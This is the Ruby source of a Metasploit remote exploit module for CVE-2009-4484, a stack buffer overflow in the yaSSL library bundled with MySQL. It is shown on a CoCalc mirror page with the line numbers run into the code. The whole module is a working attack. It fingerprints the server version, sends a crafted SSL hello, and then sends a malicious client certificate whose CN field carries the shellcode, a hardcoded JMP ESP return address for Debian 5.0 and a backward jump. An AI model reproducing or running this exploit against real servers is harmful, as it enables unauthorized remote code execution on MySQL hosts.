CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/mysql/mysql_yassl_getname.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'MySQL yaSSL CertDecoder::GetName Buffer Overflow',14'Description' => %q{15This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)16implementation bundled with MySQL. By sending a specially crafted17client certificate, an attacker can execute arbitrary code.1819This vulnerability is present within the CertDecoder::GetName function inside20"taocrypt/src/asn.cpp". However, the stack buffer that is written to exists21within a parent function's stack frame.2223NOTE: This vulnerability requires a non-default configuration. First, the attacker24must be able to pass the host-based authentication. Next, the server must be25configured to listen on an accessible network interface. Lastly, the server26must have been manually configured to use SSL.2728The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing29on Windows XP SP3, these protections successfully prevented exploitation.3031Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is32present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary33package were not exploitable due to the use of the compiler's FORTIFY feature.3435Although suse11 was mentioned in the original blog post, the binary package they36provide does not contain yaSSL or support SSL.37},38'Author' => [ 'jduck' ],39'License' => MSF_LICENSE,40'References' =>41[42[ 'CVE', '2009-4484' ],43[ 'BID', '37640' ],44[ 'BID', '37943' ],45[ 'BID', '37974' ],46[ 'OSVDB', '61956' ],47[ 'URL', 'http://web.archive.org/web/20100129041727/http://secunia.com:80/advisories/38344/' ]48],49'Privileged' => true,50'DefaultOptions' =>51{52'EXITFUNC' => 'thread',53},54'Payload' =>55{56'Space' => 1046,57'BadChars' => "",58'StackAdjustment' => -3500,59'DisableNops' => true60},61'Platform' => 'linux',62'Targets' =>63[64[ 'Automatic', { } ],65[ 'Debian 5.0 - MySQL (5.0.51a-24+lenny2)', { 'JmpEsp' => 0x0807dc34 } ]66],67'DefaultTarget' => 0,68'DisclosureDate' => '2010-01-25'))6970register_options([ Opt::RPORT(3306) ], self)71end7273def exploit7475connect7677# read the mysql server hello :)78version = nil79if (buf = sock.get_once(-1, 5) || '')80#print_status("\n" + Rex::Text.to_hex_dump(buf))81if (buf =~ /is not allowed to connect/)82fail_with(Failure::Unreachable, 'The server refused our connection!')83end8485len1,cmd = buf[0,5].unpack('VC')86rest = buf[5,len1]87idx = rest.index("\x00")88if (idx)89version = rest[0,idx]90print_status("Server reports version: #{version}")91end92end9394# handle automatic target selection95mytarget = nil96if (target.name =~ /Automatic/)97print_status("Attempting to locate a corresponding target")98version = "(" + version + ")"99targets.each { |tgt|100if (tgt.name.include?(version))101mytarget = tgt102end103}104105if (not mytarget)106fail_with(Failure::NoTarget, 'Unable to detect target automatically')107else108print_status("Using automatically detected target: #{mytarget.name}")109end110else111mytarget = target112print_status("Trying target #{mytarget.name}...")113end114115# create/send the hello packet116hello = [0x01000020].pack('V')117hello << "\x85\xae\x03\x00"+"\x00\x00\x00\x01"+"\x08\x00\x00\x00"118hello << "\x00" * 20119hello << "\x16\x03\x01\x00\x60\x01\x00\x00\x5c\x03\x01\x4a\x92\xce\xd1\xe1"120hello << "\xab\x48\x51\xc8\x49\xa3\x5e\x97\x1a\xea\xc2\x99\x82\x33\x42\xd5"121hello << "\x14\xbc\x05\x64\xdc\xb5\x48\xbd\x4c\x11\x55\x00\x00\x34\x00\x39"122hello << "\x00\x38\x00\x35\x00\x16\x00\x13\x00\x0a\x00\x33\x00\x32\x00\x2f"123hello << "\x00\x66\x00\x05\x00\x04\x00\x63\x00\x62\x00\x61\x00\x15\x00\x12"124hello << "\x00\x09\x00\x65\x00\x64\x00\x60\x00\x14\x00\x11\x00\x08\x00\x06"125hello << "\x00\x03\x02\x01\x00"126sock.put(hello)127128129# build a cn that will trigger the vulnerability130cn = rand_text(payload_space - payload.encoded.length)131cn << payload.encoded132cn << [0,0].pack('VV') # memset(x,0,0); (this is x and the length)133# NOTE: x in above (also gets passed to free())134pad = 1074 - payload_space135cn << rand_text(pad)136cn << [mytarget['JmpEsp']].pack('V')137distance = 4 + pad + 8 + payload.encoded.length138cn << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string139140cert = "\x2a\x86\x00\x84"141cert << [cn.length].pack('N')142cert << cn143cert = "\x30"+144"\x82\x01\x01"+145"\x31"+146"\x82\x01\x01"+147"\x30"+148"\x82\x01\x01"+149"\x06"+150"\x82\x00\x02" +151cert152153cert = "\xa0\x03" +154"\x02\x01\x02" +155"\x02\x01\x00" +156"\x30" + "\x0d" + "\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00" +157cert158159# wrap in 2 sequences160cert = SNMP::BER.encode_tlv(0x30, cert)161cert = SNMP::BER.encode_tlv(0x30, cert)162163cert1 = big_endian_24bit(cert.length) + cert164certs = big_endian_24bit(cert1.length) + cert1165166handshake = "\x0b" + big_endian_24bit(certs.length) + certs167msg = "\x16\x03\x01"168msg << [handshake.length].pack('n')169msg << handshake170171sock.put(msg)172173handler174disconnect175end176177178def big_endian_24bit(len)179uno = (len >> 16) & 0xff180dos = (len >> 8) & 0xff181tre = len & 0xff182[uno,dos,tre].pack('C*')183end184end185186187